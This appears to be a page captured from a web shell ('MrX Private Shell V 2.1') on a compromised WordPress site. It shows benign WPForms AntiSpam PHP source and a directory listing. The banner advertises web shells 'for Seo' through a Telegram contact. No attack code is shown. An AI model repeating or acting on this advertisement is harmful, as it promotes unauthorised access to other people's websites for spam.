__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace WPForms\Pro\Admin\Builder;
/**
* AntiSpam class.
*
* @since 1.7.8
*/
class AntiSpam extends \WPForms\Admin\Builder\AntiSpam {
/**
* Register hooks.
*
* @since 1.7.8
*/
protected function hooks() {
parent::hooks();
add_action( 'wpforms_builder_enqueues', [ $this, 'builder_assets' ] );
}
/**
* Enqueue assets for the builder.
*
* @since 1.7.8
*
* @param string $view Current view.
*/
public function builder_assets( $view ) {
$min = wpforms_get_min_suffix();
// JavaScript.
wp_enqueue_script(
'wpforms-builder-anti-spam-filters',
WPFORMS_PLUGIN_URL . "assets/pro/js/admin/builder/filters{$min}.js",
[ 'jquery', 'choicesjs' ],
WPFORMS_VERSION,
true
);
wp_localize_script(
'wpforms-builder-anti-spam-filters',
'wpforms_builder_anti_spam_filters',
[
'successfullReformatWarning' => __( 'Your keyword filter list has been reformatted. Please save these changes.', 'wpforms' ),
]
);
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Notifications | Folder | 0750 |
|
|
| Settings | Folder | 0750 |
|
|
| AntiSpam.php | File | 982 B | 0640 |
|
| Builder.php | File | 5.77 KB | 0640 |
|
| LicenseAlert.php | File | 4.57 KB | 0640 |
|
| Payments.php | File | 2.69 KB | 0640 |
|